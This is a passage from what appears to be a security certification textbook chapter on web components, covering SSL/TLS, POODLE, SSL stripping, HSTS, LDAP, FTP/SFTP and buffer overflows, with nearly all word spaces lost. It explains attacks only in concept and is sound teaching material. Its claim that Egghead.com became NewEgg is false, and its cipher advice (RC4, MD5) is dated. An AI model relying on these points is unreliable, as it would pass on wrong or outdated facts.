1.Collectthee-mailsandviewthee-mailheaderinformationinyoure-mailprogram.2.Findthe“Received:”fieldintheheadersandwritedownasmanyDNSnamesorIPaddressesasyoucan.Alsolookforcommondetailsintheheaderelementsofthedifferentmessages,suchasthesamee-mailserversandspammers.
3.UsingtheInternet,researchthephysicallocationsoftheIPaddresses.4.Reportthedifferentlocationsfromwhichyourspame-mailoriginated.Whatdidyoulearnabouttracinge-mailandspam?
chapter17 WebComponents
UnderstandingthesecurityrisksassociatedwithawebapplicationisofcriticalimportancetoimprovingthesecurityoftheWeb.
T
—AARONC.NEWMAN
Inthischapter,youwilllearnhowto
DescribethefunctioningoftheSSL/TLSprotocolsuite
Explainwebapplications,plug-ins,andassociatedsecurityissues
Describesecurefiletransferoptions
Explaindirectoryusagefordataretrieval
ExplainscriptingandotherInternetfunctionsthatpresentsecurityconcerns
Usecookiestomaintainparametersbetweenwebpages
Examineweb-basedapplicationsecurityissues
heWorldWideWebwasinventedbyTimBerners-Leetogivephysicistsaconvenientmethodofexchanginginformation.Whatbeganin1990asaphysicstoolintheEuropeanLaboratoryforParticle
Physics(CERN,theacronymfortheoriginalFrenchname)hasgrownintoacomplexsystemthatisusedbymillionsofcomputerusersfortasksfrome-commerce,toe-mail,chatting,games,andeventheoriginalintendeduse—fileandinformationsharing.BeforetheWeb,plentyofmethodswereusedtoperformthesetasks,andtheywerealreadywidespreadinuse.FileTransferProtocol(FTP)wasusedtomovefiles,andTelnetallowedusersaccesstoothermachines.WhatwasmissingwasthecommonarchitecturebroughtbyBerners-Lee:first,acommonaddressingscheme,builtaroundtheconceptofaUniformResourceLocator(URL);second,theconceptoflinkingdocumentstootherdocumentsbyURLsthroughtheHypertextMarkupLanguage(HTML).Althoughtheseelementsmightseemminor,theyformedabasethat
spreadlikewildfire.Berners-Leedevelopedtwoprogramstodemonstratetheusefulnessofhisvision:awebservertoservedocumentstousers,andawebbrowsertoretrievedocumentsforusers.Bothofthesekeyelementscontributedtothespreadofthisnewtechnologicalinnovation.Thesuccessofthesecomponentsledtonetworkafternetworkbeingconnected
togetherina“networkofnetworks”knowntodayastheInternet.MuchofthisinterconnectionwasdevelopedandfundedthroughgrantsfromtheU.S.governmenttofurthertechnologicalandeconomicgrowth.
CurrentWebComponentsandConcernsTheusefulnessoftheWebisduenotjusttobrowsers,butalsotowebcomponentsthatenableservicesforendusersthroughtheirbrowserinterfaces.Thesecomponentsuseawiderangeofprotocolsandservicestodeliverthedesiredcontent.Fromasecurityperspective,theyofferusersaneasy-to-use,securemethodofconductingdatatransfersovertheInternet.Manyprotocolshavebeendevelopedtodeliverthiscontent,althoughformostusers,thebrowserhandlesthedetails.Fromasystemspointofview,manysecurityconcernshavearisen,but
theycanbegroupedintothreemaintasks:
SecuringaserverthatdeliverscontenttousersovertheWeb
SecuringthetransportofinformationbetweenusersandserversovertheWeb
Securingtheuser’scomputerfromattackoverawebconnection
ThischapterpresentsthecomponentsusedontheWebtorequestanddeliverinformationsecurelyovertheInternet.
WebProtocolsWhentwopeoplecommunicate,severalthingsmusthappenforthecommunicationtobeeffective:theymustusealanguagethatbothpartiesunderstand,andtheymustcorrectlyusethelanguage—thatis,structureandsyntax—toexpresstheirthoughts.Themodeofcommunicationisaseparateentityentirely,forthepreviousstatementsareimportantinbothspokenandwrittenformsofcommunication.Thesamerequirementsare
presentwithrespecttocomputercommunications,andtheyareaddressedthroughprotocols,agreed-uponsetsofrulesthatallowdifferentvendorstoproducehardwareandsoftwarethatcaninteroperatewithhardwareandsoftwaredevelopedbyothervendors.BecauseoftheworldwidenatureoftheInternet,protocolsareveryimportantandformthebasisbywhichalltheseparatepartscanworktogether.Thespecificinstantiationofprotocolsisdonethroughhardwareandsoftwarecomponents.ThemajorityofthischapterconcentratesonprotocolsrelatedtotheInternetasinstantiatedbysoftwarecomponents.
ExamTip:Knowtheports!HTTPS(HTTPoverSSL)usesTCPport443.FTPS(FTPoverSSL)usesTCPport990(control)andTCPport989(datainactivemode).HypertextTransferProtocol(HTTP)usesTCPport80,andFileTransferProtocol(FTP)usesTCPport21(control)andTCPport20(datainactivemode).
Encryption(SSLandTLS)SecureSocketsLayer(SSL)isageneral-purposeprotocoldevelopedbyNetscapeformanagingtheencryptionofinformationbeingtransmittedovertheInternet.ItbeganasacompetitivefeaturetodrivesalesofNetscape’swebserverproduct,whichcouldthensendinformationsecurelytoendusers.ThisearlyvisionofsecuringthetransmissionchannelbetweenthewebserverandthebrowserbecameanInternetstandard.Today,SSLisalmostubiquitouswithrespecttoe-commerce—allbrowserssupportitasdowebservers,andvirtuallyalle-commercewebsitesusethismethodtoprotectsensitivefinancialinformationintransitbetweenwebserversandbrowsers.TheInternetEngineeringTaskForce(IETF)embracedSSLin1996
throughaseriesofRFCsandnamedthegroupofRFCsTransportLayerSecurity(TLS).StartingwithSSL3.0,in1999,theIETFissuedRFC2246,“TLSProtocolVersion1.0,”followedbyRFC2712,whichaddedKerberosauthentication,andthenRFCs2817and2818,whichextended
TLStoHTTPversion1.1(HTTP/1.1).AlthoughSSLhasbeenthroughseveralversions,TLSbeginswithanequivalencytoSSL3.0,sotodaySSLandTLSareessentiallythesame,althoughnotinterchangeable.RecentattackshaveleftSSLvulnerable,andtheconsensusisthatSSLisdeadandTLSisthepathforward,althougheveryonecallsitSSL.
AllversionsofSSLhavebeenshowntobevulnerabletobreach.ThismeanstheentireSSLsuiteisnownolongerconsideredsecure.SSLv3felltothePOODLEattackin2014,leavingonlyTLSasasecuremethod.ItisimportantthatbothclientsandwebserversaswellasotherapplicationsbeupdatedtoonlyuseTLSinthefuture.
SSL/TLSisaseriesoffunctionsthatexistsintheOSI(OpenSystemInterconnection)modelbetweentheapplicationlayerandthetransportandnetworklayers.ThegoalofTCPistosendanunauthenticated,error-freestreamofinformationbetweentwocomputers.SSL/TLSaddsmessageintegrityandauthenticationfunctionalitytoTCPthroughtheuseofcryptographicmethods.Becausecryptographicmethodsareanever-evolvingfield,andbecausebothpartiesmustagreeonanimplementationmethod,SSL/TLShasembracedanopen,extensible,andadaptablemethodtoallowflexibilityandstrength.WhentwoprogramsinitiateanSSL/TLSconnection,oneoftheirfirsttasksistocompareavailableprotocolsandagreeonanappropriatecommoncryptographicprotocolforuseinthisparticularcommunication.AsSSL/TLScanuseseparatealgorithmsandmethodsforencryption,authentication,anddataintegrity,eachoftheseisnegotiatedanddetermineddependinguponneedatthebeginningofacommunication.BrowsersfromMozilla(Firefox)andMicrosoft(InternetExplorer11)
allowfairlyextensiveSSL/TLSsetupoptions(seeFigure17.1).
•Figure17.1IE11securityoptions
HowSSL/TLSWorksSSL/TLSusesawiderangeofcryptographicprotocols.Asof2014,SSLisnolongerconsideredsecure,withSSLv3fallingvictimtothePOODLE(PaddingOracleOnDowngradedLegacyEncryption)attack.Throughoutthebook,allreferencestoSSLshouldbeconsideredtobeforTLSonly.ItwilltakeagenerationorlongerforthetermSSLtofadeinfavorofTLS,ifever.Thequestionsaskedandansweredarewhichprotocolandwhich
cryptographicalgorithmwillbeused.Fortheclientandservertocommunicate,bothsidesmustagreeonacommonlyheldprotocol(SSLv1,v2,v3,orTLSv1,v1.1,v1.2).CommonlyavailablecryptographicalgorithmsincludeDiffie-HellmanandRSA.Thenextstepistoexchangecertificatesandkeysasnecessarytoenableauthentication.
TechTip
POODLEAttackThePaddingOracleOnDowngradedLegacyEncryption(POODLE)attackisacryptographicattackusingthepaddingofamessage.ResearchersatGooglehavediscoveredhowtoperformsuchanattackonTLSandSSL.ThebestmethodofpreventingtheattackonclientsisthroughthedisablingofSSLv3.GoogleandMozillahavebothremovedSSLsupportfromChromeandFirefox,respectively.ThePOODLEattackonTLSinvolvesanimplementationerrorontheserversideandcanbecorrectedviapatching.
Onceauthenticationisestablished,thechannelissecuredwithsymmetrickeycryptographicmethodsandhashes,typicallyRC4or3DESforsymmetrickeyandMD5orSHA-1forthehashfunctions.
TechTip
TLSnotSSLJustknowthatTLSshouldbeusedinplaceofSSLforallinstances.Tousetheseprotocolseffectivelybetweenaclientandaserver,anagreementmustbereachedonwhichprotocoltouse,whichisdoneviatheTLShandshakeprocess.Theprocessbeginswithaclientrequestforasecureconnectionandaserver’sresponse.Althoughsimilar,SSLisnolongersecureandTLSremainstheonlyoption.
TechTip
TLSHandshakeThefollowingsteps,depictedintheillustrationbelow,establishaTLSsecuredchannel(theSSLhandshakeisdeprecatedduetoallversionsofSSLbeingcompromised):
1.Theclientsendstotheservertheclient’sTLSversionnumber,ciphersettings,andsession-specificdata.
2.Theserversendstotheclienttheserver’sTLSversionnumber,ciphersettings,session-specificdata,anditsowncertificate.Iftheresourcerequestedrequiresclientauthentication,theserverrequeststheclient’scertificate.
3.Theclientauthenticatestheserverusingtheinformationithasreceived.Iftheservercannotbeauthenticated,theuseriswarnedoftheproblemandinformedthatan
encryptedandauthenticatedconnectioncannotbeestablished.4.Theclientencryptsaseedvaluewiththeserver’spublickey(fromcertificate—step2)andsendsittotheserver.Iftheserverrequestedclientauthentication,theclientalsosendstheclientcertificate.
5.Iftheserverrequestedclientauthentication,theserverattemptstoauthenticatetheclientcertificate.Iftheclientcertificatecannotbeauthenticated,thesessionends.
6.Theserverusesitsprivatekeytodecryptthesecret,andthenperformsaseriesofsteps(whichtheclientalsoperforms)togenerateamastersecret.Therequiredstepsdependonthecryptographicmethodusedforkeyexchange.
7.Boththeclientandtheserverusethemastersecrettogeneratethesessionkey,whichisasymmetrickeyusedtoencryptanddecryptinformationexchangedduringtheTLSsession.
8.Theclientsendsamessageinformingtheserverthatfuturemessagesfromtheclientwillbeencryptedwiththesessionkey.Itthensendsaseparate(encrypted)messageindicatingthattheclientportionofthehandshakeisfinished.
9.Theserversendsamessageinformingtheclientthatfuturemessagesfromtheserverwillbeencryptedwiththesessionkey.Itthensendsaseparate(encrypted)messageindicatingthattheserverportionofthehandshakeisfinished.
10.TheTLShandshakeisnowcompleteandthesessioncanbegin.
ExamTip:Authenticationwasaone-wayprocessforSSLv1andv2,withonlytheserverprovidingauthentication.InSSLv3/TLS,mutualauthenticationofbothclientandserverispossible.TheexamwillstillhaveSSL!
Atthispoint,theauthenticityoftheserverandpossiblytheclienthasbeenestablished,andthechannelisprotectedbyencryptionagainsteavesdropping.Eachpacketisencryptedusingthesymmetrickeybeforetransferacrossthenetwork,andthendecryptedbythereceiver.AllofthisworkrequiresCPUtime;hence,SSL/TLSconnectionsrequiresignificantlymoreoverheadthanunprotectedconnections.Establishingconnectionsisparticularlytimeconsuming,soevenstatelesswebconnectionsareheldinastatefulfashionwhensecuredviaSSL/TLS,toavoidrepeatingthehandshakeprocessforeachrequest.Thismakessome
webserverfunctionalitymoredifficult,suchasimplementingwebfarms,andrequiresthateitheranSSL/TLSappliancebeusedbeforethewebservertomaintainstateortheSSL/TLSstateinformationbemaintainedinadirectory-typeserviceaccessiblebyallofthewebfarmservers.Eithermethodrequiresadditionalinfrastructureandequipment.However,toenablesecuree-commerceandotherprivatedatatransactionsovertheInternet,thisisacost-effectivemethodtoestablishaspecificlevelofnecessarysecurity.
TechTip
CertificatesAcertificateismerelyastandardsetofformatteddatathatrepresentstheauthenticityofthepublickeyassociatedwiththesigner.Iftheissuerisathirdpartyofstature,suchasVeriSignorAT&T,youcanrestyourfaithuponthatauthenticity.IftheissuerisalargefirmsuchasMicrosoft,youcanprobablytrustitifyouaredownloadingitscode.IftheissuerisBob’sCertificateShack—well,unlessyouknowBob,youmayhavecauseforconcern.Certificatesdonotvouchforcodesecurity;theyonlysaythatthepersonorentitythatissigningthemisactuallythepersonorentitytheyclaimtobe.DetailsofcertificatesandPKIelementstosupporttheirusearecoveredinChapter6,andyouareencouragedtobrushuponthemifneeded.
Theuseofcertificatescouldpresentalotofdataandcomplicationtoauser.Fortunately,browsershaveincorporatedmuchofthisdesiredfunctionalityintoaseamlessoperation.OnceyouhavedecidedalwaystoacceptcodefromXYZCorporation,subsequentcertificatechecksarehandledbythebrowser.TheabilitytomanipulatecertificatesettingsisundertheOptionsmenusinbothInternetExplorer(Figures17.2and17.3)andMozillaFirefox(Figures17.4and17.5).
•Figure17.2InternetExplorercertificatemanagementoptions
•Figure17.3InternetExplorercertificatestore
•Figure17.4Firefoxcertificateoptions
•Figure17.5Firefoxcertificatestore
TechTip
SSL/TLSAttacksSSL/TLSisspecificallydesignedtoprovideprotectionfromman-in-themiddleattacks.Byauthenticatingtheserverendoftheconnection,SSL/TLSwasdesignedtopreventtheinitialhijackingofasession.Byencryptingalloftheconversationsbetweentheclientandtheserver,SSL/TLSpreventseavesdropping.Evenwithallofthis,however,SSL/TLSisnotacompletesecuritysolutionandcanbedefeated.
OnceacommunicationisintheSSL/TLSchannel,itisverydifficulttodefeattheSSLprotocol.Beforedataentersthesecuredchannel,however,defeatispossible.ATrojanprogramthatcopieskeystrokesandechoesthemtoanotherTCP/IPaddressinparallelwiththeintendedcommunicationcandefeatSSL/TLS,forexample,providedthattheTrojanprogramcopiesthedatapriortoSSL/TLSencapsulation.Thistypeofattackhasoccurredandhasbeenusedtostealpasswordsandothersensitivematerialfromusers,performingthetheftastheuseractuallytypesinthedata.
TechTip
SSL/TLSProxyAttackSSL/TLS-basedsecurityisnotfoolproof.Itcanbedefeated,asinthecaseofaproxy-basedattack.Examiningthehandshake,thefollowingstepscouldoccur,asshowninthisillustration:
•SSL/TLSman-in-the-middleattack
1.Theclient(C)initiatesaTLSsessionwiththeirbankserver(S)throughaproxy(P).2.PactsbyechoingtheinformationsenttoitbyC(step1a)toS(step1b),imitatingCtoS,andestablishingasecurechannelbetweenPandS(TLS#1).
3.PcreatesasecondsecurechanneltoC(TLS#2),usinginformationreceivedfromS,pretendingtobeS.
4.Theuserassumesthatthedottedlinesoccur—asecurechanneltothebankdirectly—whentheclientactuallyhasonlyasecurechanneltotheproxy.Infact,theproxyhasthesecurechanneltothebank,andasfarasthebankisconcerned,theproxyistheclientandusingtheclient’scredentials.Foraproxythatisnotcompletelytrusted,thiscouldbeanightmarefortheclient.
Theadventofhigh-assurancecertificatespreventstheproxyfromimitatingthebank,asitcannotgivethecorrectsetofcredentialsbacktotheclienttocompletethehigh-assurancehandshake.Mutualauthenticationisalsodesignedtopreventthis,astheproxycannotsimultaneouslyimitatebothsidesofthehandshake.Mutualauthenticationisrarelyused,asthereistheissueofmaintainingclientcertificatesthataretrustedtoaserver—achallengeforbroad-reachsiteslikefinancialinstitutionsande-commercesites.
TheWeb(HTTPandHTTPS)HTTPisusedforthetransferofhyperlinkeddataovertheInternet,fromwebserverstobrowsers.WhenausertypesaURLsuchashttp://www.example.comintoabrowser,thehttp://portionindicatesthatthedesiredmethodofdatatransferisHTTP.AlthoughitwasinitiallycreatedjustforHTMLpages,todaymanyprotocolsdelivercontentoverthisconnectionprotocol.HTTPtraffictakesplaceoverTCPport80bydefault,andthisportistypicallyleftopenonfirewallsbecauseoftheextensiveuseofHTTP.OneoftheprimarydriversbehindthedevelopmentofSSL/TLSwasthe
desiretohidethecomplexitiesofcryptographyfromendusers.WhenusinganSSL/TLS-enabledbrowser,thiscanbedonesimplybyrequestingasecureconnectionfromawebserverinsteadofanonsecureconnection.WithrespecttoHTTPconnections,thisisassimpleasusinghttps://inplaceofhttp://.TheentryofanSSL/TLS-basedprotocolwillcauseabrowserto
performthenecessarynegotiationswiththewebservertoestablishtherequiredlevelofsecurity.Oncethesenegotiationshavebeencompletedandthesessionissecuredbyasessionkey,aclosedpadlockiconisdisplayedinthelowerrightofthescreentoindicatethatthesessionissecure.Iftheprotocolishttps:,yourconnectionissecure;ifitishttp:,thentheconnectioniscarriedbyplaintextforanyonetosee.Figure17.6showsasecureconnectioninInternetExplorer,andFigure17.7showstheequivalentinFirefox.AsofInternetExplorer7,Microsoftplacesthepadlockiconinanobviousposition,nexttotheURL,insteadofinthelower-rightcornerofthescreen,whereuserscouldmoreeasilymissit.Tocombatavarietyofattacks,in2006theSSL/TLSlandscapechangedwith
theadventofextendedvalidationcertificatesandhighsecuritybrowsers.ThesechangesprovidevisualcuestotheuserwhenhighassurancecertificatesarebeingusedaspartofasecureSSL/TLSconnection.Theseimprovementswereinresponsetophishingsitesandonlinefraud,andalthoughtheyrequireadditionalcostsandregistrationonthepartofthevendors,thisisamodestup-frontcosttohelpreducefraudandprovideconfidencetocustomers.
•Figure17.6High-assurancenotificationinInternetExplorer
•Figure17.7High-assurancenotificationinFirefox
Theobjectiveofenablingcryptographicmethodsinthisfashionistomakeiteasyforenduserstousetheseprotocols.SSL/TLSisdesignedtobeprotocolagnostic.AlthoughdesignedtorunontopofTCP/IP,itcanoperateontopofother,lower-levelprotocols,suchasX.25.SSL/TLSrequiresareliablelower-levelprotocol,soitisnotdesignedandcannotproperlyfunctionontopofanonreliableprotocolsuchastheUserDatagramProtocol(UDP).Evenwiththislimitation,SSL/TLShasbeenusedtosecuremanycommonTCP/IP-basedservices,asshowninTable17.1.
Table17.1 SSL/TLS-ProtectedServices
HTTPSEverywhereWhenwebsiteswerefirstdeployed,providingHTTPSwasaresourcecostissue,becauseittookprocessorcyclestoencryptalltheconnections.Today,withavarietyofencryptiontechnologiesavailable,managingtheresourcesforHTTPSconnectionsismucheasier,andacasehasbeenmadebymanyinsecuritythatallwebconnectionsshouldbeHTTPS.ThishasresultedintheHTTPSEverywheremovement(https://www.eff.org/https-everywhere/),spearheadedbytheElectronicFrontierFoundation(EFF).
IfwebsiteseverywherewouldturnoffHTTPinfavorofusingonlyHTTPS(withTLSinlightofSSLvulnerabilities),thiswouldnotsolveallthesecurityproblems,butitwouldraisethebarsubstantiallyformanyattacks.HTTPSEverywherewouldgoalongwayforprivacy,becauseitwouldpreventdatasnooping.Itwouldalsopreventmanyman-in-the-middleattacks,suchasSSLstripping.
BecausenotallsitesareHTTPSyet,theEFFhasdevelopedaplug-inforbrowserscalledHTTPSEverywhere.Thisplug-inhelpsthebrowsermaintainanHTTPSconnectionandwarnswhenitisnotpresent.
HTTPStrictTransportSecurityHTTPStrictTransportSecurity(HSTS)isanIETFstandardandamechanismtoenforcerulestopreventbrowsersfromdowngradingsecuritywhenaccessingasite.ThepolicystatesthatwhenawebserverprovidesanHTTPresponseheaderfieldnamed“Strict-Transport-Security,”thentheuseragentshallcomplybynotissuinginsecurerequests.Theheaderfieldhasatimeperiodassociatedwithit,setintheheader,duringwhichthepolicyisineffect.HSTSwascreatedinresponsetoaseriesofattackprofiles,themost
criticalbeingtheSSLstrippingman-in-the-middleattacks,firstpubliclyintroducedbyMoxieMarlinspike.TheSSLstrippingattackworksonbothSSLandTLSbytransparentlyconvertingthesecureHTTPSconnectionintoaplainHTTPconnection,removingthetransportlayerencryptionprotections.Althoughanobservantusermightnoticethedropinsecurity,bythenthedamagemayhavebeendone,andthisreliesuponusersknowingwhetherapageshouldbesecureornot.Nowarningsarepresentedtotheuserduringthedowngradeprocess,whichmakestheattackfairlysubtletoallbutthemostvigilant.Marlinspike’ssslstriptoolfullyautomatestheattackandisavailableontheWeb.
TryThis!SniffYourOwnConnections!DeterminingwhatlevelofprotectionyouhavewhensurfingtheWebiseasy.Useapacket-sniffingtoollikeWiresharktorecordyourowncommunications.BecauseHTTPSendsatyourbrowser,thepacketcapturemechanismshouldreflectthesameexperienceanoutsiderwillseeifsniffingyourtraffic.Byexaminingthepackets,youcanseeiftrafficisencrypted,whichtrafficisencrypted,andwhatisvisibletooutsiders.
DirectoryServices(DAPandLDAP)Adirectoryisadatastoragemechanismsimilartoadatabase,butithasseveraldistinctdifferencesdesignedtoprovideefficientdataretrievalservicescomparedtostandarddatabasemechanisms.Adirectoryisdesignedandoptimizedforreadingdata,offeringveryfastsearchandretrievaloperations.Thetypesofinformationstoredinadirectorytendtobedescriptiveattributedata.Adirectoryoffersastaticviewofdatathatcanbechangedwithoutacomplexupdatetransaction.Thedataishierarchicallydescribedinatreelikestructure,andanetworkinterfaceforreadingistypical.
Asdirectoriesareoptimizedforreadoperations,theyarefrequentlyemployedwheredataretrievalisdesired.Commonusesofdirectoriesincludee-mailaddresslists,domainserverdata,andresourcemapsofnetworkresources.
LDAPoverTCPisaplaintextprotocol,meaningdataispassedintheclearandissusceptibletoeavesdropping.Encryptioncanbeusedtoremedythisproblem,andtheapplicationofSSL/TLS-basedserviceswillprotectdirectoryqueriesandrepliesfromeavesdroppers.
Toenableinteroperability,theX.500standardwascreatedasastandardfordirectoryservices.TheprimarymethodforaccessinganX.500directoryisthroughtheDirectoryAccessProtocol(DAP),aheavyweightprotocolthatisdifficulttoimplementcompletely,especiallyonPCsandmoreconstrainedplatforms.ThisledtotheLightweightDirectoryAccessProtocol(LDAP),whichcontainsthemostcommonlyusedfunctionality.LDAPcaninterfacewithX.500services,and,mostimportantly,LDAPcanbeusedoverTCPwithsignificantlylesscomputingresourcesthanafullX.500implementation.LDAPoffersallofthefunctionalitymostdirectoriesneedandiseasierandmoreeconomicaltoimplement;henceLDAPhasbecometheInternetstandardfordirectoryservices.
SSL/TLSLDAPSSL/TLSprovidesseveralimportantfunctionstoLDAPservices.Itcanestablishtheidentityofadatasourcethroughtheuseofcertificates,anditcanalsoprovidefortheintegrityandconfidentialityofthedatabeingpresentedfromanLDAPsource.AsLDAPandSSL/TLSaretwoseparateindependentprotocols,interoperabilityismoreafunctionofcorrectsetupthananythingelse.ToachieveLDAPoverSSL/TLS,thetypicalsetupistoestablishanSSL/TLSconnectionandthenopenanLDAPconnectionovertheprotectedchannel.TodothisrequiresthatboththeclientandtheserverbeenabledforSSL/TLS.Inthecaseoftheclient,mostbrowsersarealreadyenabled.InthecaseofanLDAPserver,thisspecificfunctionmustbeenabledbyasystemadministrator.Asthissetupinitiallyiscomplicated,it’sdefinitelyataskforacompetentsystemadministrator.OnceanLDAPserverissetuptofunctionoveranSSL/TLS
connection,itoperatesasitalwayshas.TheLDAPserverrespondstospecificquerieswiththedatareturnedfromanodeinthesearch.TheSSL/TLSfunctionalityistransparenttothedataflowfromtheuser’sperspective.Fromtheoutside,SSL/TLSpreventsobservationofthedatarequestandresponse,ensuringconfidentiality.
FileTransfer(FTPandSFTP)OneoftheoriginalintendedusesoftheInternetwastotransferfilesfromonemachinetoanotherinasimple,secure,andreliablefashion,whichwasneededbyscientificresearchers.Today,filetransfersrepresentdownloadsofmusiccontent,reports,andotherdatasetsfromothercomputersystemstoaPC-basedclient.Until1995,themajorityofInternettrafficwasfiletransfers.Withallofthisneed,aprotocolwasnecessarysothattwocomputerscouldagreeonhowtosendandreceivedata.Assuch,FTPisoneoftheolderprotocols.
FTPFileTransferProtocol(FTP)isanapplication-levelprotocolthatoperatesoverawiderangeoflower-levelprotocols.FTPisembeddedinmostoperatingsystemsandprovidesamethodoftransferringfilesfromasendertoareceiver.MostFTPimplementationsaredesignedtooperatebothways,sendingandreceiving,andcanenableremotefileoperationsoveraTCP/IPconnection.FTPclientsareusedtoinitiatetransactions,andFTPserversareusedtorespondtotransactionrequests.Theactualrequestcanbeeithertoupload(senddatafromclienttoserver)ortodownload(senddatafromservertoclient).
TechTip
FTPIsNotSecureFTPisaplaintextprotocol.Usercredentialsusedforloginsaresentplaintextacrossthenetwork.FiletransfersviaFTPcanbeeitherbinaryorintextmode,butineithercase,theyareinplaintextacrossthenetwork.Ifconfidentialityofatransferisdesired,thenasecurechannelshouldbeusedforthetransfer.Ifintegrityisaconcern,amorecomplexmethodoftransferwillberequired,tosupportdigitalhashesandsignatures.
ClientsforFTPonaPCcanrangefromanapplicationprogram,tothecommand-lineFTPprograminWindows/DOS,tomostbrowsers.Toopen
anFTPdatastoreinabrowser,youcanenterftp://urlinthebrowser’saddressfieldtoindicatethatyouwanttoseethedataassociatedwiththeURLviaanFTPsession—thebrowserhandlesthedetails.
BlindFTP(AnonymousFTP)Toaccessresourcesonacomputer,anaccountmustbeusedtoallowtheoperatingsystem–levelauthorizationfunctiontowork.InthecaseofanFTPserver,youmaynotwishtocontrolwhogetstheinformation,soastandardaccountcalledanonymousexists.Thisallowsunlimitedpublicaccesstothefilesandiscommonlyusedwhenyouwanttohaveunlimiteddistribution.Onaserver,accesspermissionscanbeestablishedtoallowonlydownloadingoronlyuploadingorboth,dependingonthesystem’sfunction.
AsFTPcanbeusedtoallowanyoneaccesstouploadfilestoaserver,itisconsideredasecurityriskandiscommonlyimplementedonspecializedserversisolatedfromothercriticalfunctions.
AsFTPserverscanpresentasecurityrisk,theyaretypicallynotpermittedonworkstationsandaredisabledonserverswithoutneedforthisfunctionality.
SFTPFTPoperatesinaplaintextmode,soaneavesdroppercanobservethedatabeingpassed.Ifconfidentialtransferisrequired,SecureFTP(SFTP)combinesboththeSecureShell(SSH)protocolandFTPtoaccomplishthistask.SFTPoperatesasanapplicationprogramthatencodesboththecommandsandthedatabeingpassedandrequiresSFTPtobeonboththeclientandtheserver.SFTPisnotinteroperablewithstandardFTP—theencryptedcommandscannotbereadbythestandardFTPserverprogram.ToestablishSFTPdatatransfers,theservermustbeenabledwiththe
SFTPprogram,andthenclientscanaccesstheserver,providedtheyhavethecorrectcredentials.OneofthefirstSFTPoperationsisthesameasthatofFTP:anidentificationfunctionthatusesausernameandanauthorizationfunctionthatusesapassword.ThereisnoanonymousSFTPaccountbydefinition,soaccessisestablishedandcontrolledfromtheserverusingstandardaccesscontrollists(ACLs),IDs,andpasswords.
VulnerabilitiesModernencryptiontechnologycanprovidesignificantlevelsofprivacy,uptomilitary-gradesecrecy.TheuseofprotocolssuchasTLSprovidesaconvenientmethodforenduserstousecryptographywithouthavingtounderstandhowitworks.Thiscanresultincomplacency—theimpressionthatonceTLSisenabled,theuserissafe,butthisisnotnecessarilythecase.IfaTrojanprogramisrecordingkeystrokesandsendingtheinformationtoanotherunauthorizeduser,forexample,TLScannotpreventthesecuritybreach.Iftheuserisconnectingtoanuntrustworthysite,themerefactthattheconnectionissecuredoesnotpreventtheothersitefromrunningascam.
TLSisnotaguaranteeofsecurity.AllTLScandoissecurethetransportlinkbetweenthecomputerandtheserver.Therearestillanumberofvulnerabilitiesthatcanaffectthesecurityofthesystem.AkeyloggerontheclientcancopythesecretsbeforetheygototheTLS-protectedlink.Malwareoneitherendofthesecurecommunicationcancopyand/oraltertransmissionsoutsidethesecurelink.
UsingTLSandotherencryptionmethodswillnotguardagainstyourcreditcardinformationbeing“lost”byacompanywithwhichyoudobusiness,asintheEgghead.comcreditcardhackof2000.InDecember2000,Egghead.com’screditcarddatabasewashacked,andasmanyas3.7millioncreditcardnumberswereexposed.Thisresultedeventuallyinthe
lossofthefirm,whichisnowknownasNewEgg.Theyear2014wasayearfilledwithdatabreaches,lossesofcustomerinformation—includingcreditcardnumbers—frommanyhigh-profilemerchantssuchasTarget.Inthesecases,thesecurityfailurewasinternaltothedatastorageinthecompany,notduringtransfertothefirm.Soevenwithsecurewebcontrols,datacanbelostafterbeingstoredinacompanydatabase.Thekeytounderstandingwhatisprotectedandwhereitisprotectedis
tounderstandwhattheseprotocolscanandcannotdo.TheTLSsuitecanprotectdataintransit,butnotoneitherendinstorage.Itcanauthenticateusersandservers,providedthatthecertificatemechanismsareestablishedandusedbybothparties.Properlysetupandused,TLScanprovideaverysecuremethodofauthentication,followedbyconfidentialityindatatransfersanddataintegritychecking.Butagain,allofthisoccursduringtransit,andtheprotectionendsoncethedataisstored.
Code-BasedVulnerabilitiesTheabilitytoconnectmanymachinestogethertotransferdataiswhatmakestheInternetsofunctionalforsomanyusers.Browsersenablemuchofthisfunctionality,andasthetypesofdatahavegrownontheInternet,browserfunctionalityhasgrownaswell.Butnotallfunctionscanbeanticipatedorincludedineachbrowserrelease,sotheideaofextendingbrowserfunctionsthroughplug-insbecameastandard.Browserscanperformmanytypesofdatatransfer,andinsomecases,additionalhelperprograms,orplug-ins,canincreasefunctionalityforspecifictypesofdatatransfers.Inothercases,separateapplicationprogramsmaybecalledbyabrowsertohandlethedatabeingtransferred.Commonexamplesoftheseplug-insandprogramsincludeShockwaveandFlashplug-ins,WindowsMediaPlayer,andAdobeAcrobat(bothplug-inandstandalone).TherichnessthatenablesthedesiredfunctionalityoftheInternethasalsospawnedsomeadditionaltypesofinterfacesintheformofActiveXcomponentsandJavaapplets.Inessence,allofthesearepiecesofcodethatcanbewrittenbythird
parties,distributedviatheInternet,andrunonyourPC.Ifthecodedoeswhattheuserwants,theuserishappy.Buttheopportunityexistsfortheseapplicationsorplug-instoincludemaliciouscodethatperformsactionsnotdesiredbytheenduser.Maliciouscodedesignedtooperatewithinawebbrowserenvironmentisamajortoolforcomputercrackerstousetoobtainunauthorizedaccesstocomputersystems.WhetherdeliveredbyHTML-basede-mail,bygettingausertovisitawebsite,orevendeliveryviaanadserver,theresultisthesame:malwareperformsmalicioustasksinthebrowserenvironment.
BufferOverflowsOneofthemostcommonexploitsusedtohackintosoftwareisthebufferoverflow.Thebufferoverflowvulnerabilityisaresultofpoorcodingpracticesonthepartofsoftwareprogrammers—whenanyprogramreadsinputintoabuffer(anareaofmemory)anddoesnotvalidatetheinputforcorrectlength,thepotentialforabufferoverflowexists.Thebuffer-overflowvulnerabilityoccurswhenanapplicationcanacceptmoreinputthanithasassignedstoragespaceandtheinputdataoverwritesotherprogramareas.Theexploitconceptissimple:Anattackerdevelopsanexecutableprogramthatperformssomeactiononthetargetmachineandappendsthiscodetoalegitimateresponsetoaprogramonthetargetmachine.Whenthetargetmachinereadsthroughthetoo-longresponse,abuffer-overflowconditioncausestheoriginalprogramtofail.Theextramaliciouscodefragmentisnowinthemachine’smemory,awaitingexecution.Iftheattackerexecuteditcorrectly,theprogramwillskipintotheattacker’scode,runningitinsteadofcrashing.
